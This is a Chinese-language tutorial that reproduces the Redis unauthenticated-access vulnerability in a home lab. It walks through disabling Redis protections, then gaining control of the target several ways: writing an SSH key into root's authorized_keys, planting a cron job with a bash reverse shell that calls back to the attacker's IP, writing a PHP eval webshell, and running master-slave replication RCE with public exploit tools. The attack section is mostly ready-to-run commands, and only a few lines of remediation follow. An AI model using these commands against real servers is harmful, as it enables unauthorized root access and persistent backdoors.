一、漏洞产生原因
redis安装完之后,默认情况下绑定在 0.0.0.0:6379,且没有对登录IP做限制,并且没有设置密码(默认为空)。
二、漏洞危害
攻击者无需认证即可访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据;
攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件;
最严重的情况,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。
三、靶场搭建
3.1、redis数据库下载安装
本地实验采用的是最新版:6.2.5
访问 https://redis.io/download 下载稳定版本
本地实验使用的是centos8,执行安装命令:
https://download.redis.io/releases/redis-6.2.5.tar.gz
tar xzf redis-6.2.5.tar.gz
cd redis-6.2.5
make //编译成功之后,redis成功安装
3.2、搭建 redis 未授权访问漏洞靶场
3.2.1 redis 启动命令:
cd src
./redis-server
成功启动如下图所示:
3.2.2 接下来编辑redis配置文件redis.conf,去掉ip绑定,允许除本地外的主机远程登录redis服务:
找到下图所示位置,将bind 127.0.0.1 前面加个注释符 #
修改前截图:
修改后截图:
3.2.3 关闭保护模式,允许远程连接redis服务:
编辑redis配置文件redis.conf,将 yes改为no
修改前截图:
修改后截图:
3.2.4 修改完之后,重新启动
重启redis服务。注意在重启的时候要指定redis.conf这样redis.conf才可以生效
./redis-server /root/redis-6.2.5/redis.conf
**注意:**如果重启报错,如下图所示,需要 netstat -anpt 找到 之前redis服务的进程 PID,把之前的 kill 了之后,就可以重新启动redis服务了
3.2.5 关闭防火墙
//查看防火墙状态
systemctl stop firewalld.service //关闭防火墙
**靶场环境: ** 懒得自己搭建的可以在 知识星球 或者 我的资源 中下载
四、漏洞复现 GETSHELL 利用
目标靶机,IP:192.168.241.129
攻击主机,IP:192.168.241.128
namp 扫描一波,发现目标靶机开放 6379 端口
使用 redis 客户端连接测试,发现存在未授权访问漏洞
那么接下来就是利用 redis 未授权访问漏洞 getshell 了
4.1 公私钥认证 GETSHELL
**前提: **
1、redis服务使用 root 账号启动
2、服务器开放了SSH服务,而且允许使用密钥登录
4.1.1 先在本地生成一对密钥
kali 攻击机执行命令:
h-keygen -t rsa
4.1.2 然后通过redis执行查看是否存在 /root/.ssh 文件
config set dir /root/.ssh
config set dbfilename authorized_keys
save
如下图所示,说明存在 /root/.ssh 文件
4.1.3 将公钥写入到目标靶机中
cd .ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > redistest.txt
#将生成的公钥保存到redistest.txt
cat redistest.txt | redis-cli -h 受害者ip -x set redistest
#将保存ssh公钥的redistext.txt写入redis
4.1.3 成功写入之后,ssh远程连接
cd .ssh
ssh -i id_rsa root@192.168.241.129
如下图所示,已经拿到目标靶机的 root 权限,并成功登录
4.2 计划任务反弹shell
**前提: **
1、redis以root身份运行
4.2.1 在kali开启nc 监听端口 6666
nc -nvlp 6666
4.2.2 连接redis后写入shell
redis-cli -h 192.168.241.129
config set dir /var/spool/cron
set x "\n* * * * * bash -i >& /dev/tcp/192.168.241.128/6666 0>&1\n"
config set dbfilename root
save
kali监听反弹 shell 了,成功
4.3 绝对路径写webshell
**前提: **
1、服务器存在WEB网站,且知道绝对路径
4.3.1 利用 redis 未授权写一句话木马
config set dir /var/www/html/
config set dbfilename redis.php
set shell " <?php @eval($_POST['x']); ?>"
save
写入一句话木马文件 redis.php 之后进行访问测试
成功 getshell ,是普通用户权限,接下来可以进一步提权。
4.4 利用主从复制RCE
前提: 漏洞存在于4.x、5.x版本中,Redis提供了主从模式。
原理:
主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上。然后在从机上加载恶意so文件,即可执行命令。
靶场搭建:
利用 vulhub 的 Redis 4.x/5.x 未授权访问漏洞靶场
4.4.1 首先验证是否存在未授权访问漏洞
4.4.2 利用脚本 getshell
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand(需要make)
git clone https://github.com/Ridter/redis-rce.git
https://github.com/vulhub/redis-rogue-getshell
https://github.com/jas502n/Redis-RCE
命令如下图所示,直接 getshell 了
五、漏洞修复
1、禁止外部访问redis服务端口。
2、禁止root权限启动redis服务。
3、限制访问redis服务的IP。
更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥